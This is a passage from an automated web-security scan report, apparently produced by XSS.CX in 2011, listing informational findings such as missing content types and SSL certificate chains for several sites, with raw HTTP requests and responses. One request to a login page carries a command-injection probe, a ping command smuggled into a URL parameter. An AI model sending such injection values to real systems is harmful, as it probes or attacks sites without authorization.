In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

25.1. http://ads.bluelithium.com/st previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.bluelithium.com
Path:	/st

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1948192&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=11&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308227126152&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

25.2. http://ads.pointroll.com/PortalServe/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/PortalServe/

Request

GET /PortalServe/?pid=1299616Y09720110506203727&flash=10&time=4|7:46|-5&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click.ic?$CTURL$&pos=x&dom=http://www.cnbc.com&r=0.5130123335402459 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1308228366223&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=A0A50400-0DFC-35A3-0209-123004DD0100; PRca=|AJfR*19:1|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AJfRAAAT:1|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|EzNM:1|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GMb9:1|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|EzNMGMb9:1|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Jun 2011 13:13:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache

location.replace('http://www.cnbc.com/images/cnbc/iframebuster/PointRollAds.htm?pid=1299616Y09720110506203727&redir=http://a1.interclick.com/icaid/167861/tid/4a045fc6-cdd4-4a77-8259-0e847f203842/click
...[SNIP]...

25.3. https://soundcloud.com/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/login

Request

POST /login?ref=%22%26%20ping%20-n%2026%20127.0.0.1%20%26 HTTP/1.1
Referer: https://soundcloud.com/login?ref=top
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=22ae01d6324b4a758626d754c81638bf
Host: soundcloud.com
Cookie: _soundcloud_session=BAh7BjoPc2Vzc2lvbl9pZCIlNGNhMGU1ZWFhN2QwNjQ1Y2E5ODU4ZDUzZWExNDdkZWY%3D--0d44aa8533991ae2be0951e15c0c668e434312dc
Content-Length: 603
Expect: 100-continue
Accept-Encoding: gzip, deflate

--22ae01d6324b4a758626d754c81638bf
Content-Disposition: form-data; name="blogs-list"

3
--22ae01d6324b4a758626d754c81638bf
Content-Disposition: form-data; name="commit"

Post
--22ae01d6324b4a7
...[SNIP]...

Response

HTTP/1.1 100 Continue

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 16 Jun 2011 19:29:48 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Runtime: 21
ETag: "1738f742fd61dd7dd8b6ae
...[SNIP]...

26. SSL certificate previous
There are 3 instances of this issue:

https://services.wsj.com/
https://soundcloud.com/
https://www.mavitunasecurity.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

26.1. https://services.wsj.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://services.wsj.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	services.wsj.com
Issued by:	VeriSign Class 3 Secure Server CA - G3
Valid from:	Wed Oct 13 19:00:00 CDT 2010
Valid to:	Tue Nov 08 17:59:59 CST 2011

Certificate chain #1

Issued to:	VeriSign Class 3 Secure Server CA - G3
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

Certificate chain #3

Issued to:	VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:	VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:	Tue Nov 07 18:00:00 CST 2006
Valid to:	Wed Jul 16 18:59:59 CDT 2036

26.2. https://soundcloud.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://soundcloud.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	soundcloud.com,L=Birmingham,ST=Birmingham,C=GB,2.5.4.5=#13083036333433363030
Issued by:	thawte Extended Validation SSL CA
Valid from:	Sun Jul 18 19:00:00 CDT 2010
Valid to:	Sat Aug 18 18:59:59 CDT 2012

Certificate chain #1

Issued to:	thawte Extended Validation SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Nov 16 17:59:59 CST 2016

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

26.3. https://www.mavitunasecurity.com/ previous

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.mavitunasecurity.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.mavitunasecurity.com
Issued by:	Starfield Secure Certification Authority
Valid from:	Sat Aug 21 10:02:55 CDT 2010
Valid to:	Sun Aug 26 05:09:38 CDT 2012

Certificate chain #1

Issued to:	Starfield Secure Certification Authority
Issued by:	Starfield Class 2 Certification Authority
Valid from:	Wed Nov 15 19:15:40 CST 2006
Valid to:	Sun Nov 15 19:15:40 CST 2026

Certificate chain #2

Issued to:	Starfield Class 2 Certification Authority
Issued by:	Starfield Class 2 Certification Authority
Valid from:	Tue Jun 29 12:39:16 CDT 2004
Valid to:	Thu Jun 29 12:39:16 CDT 2034

Report generated by XSS.CX at Fri Jun 17 06:40:33 CDT 2011.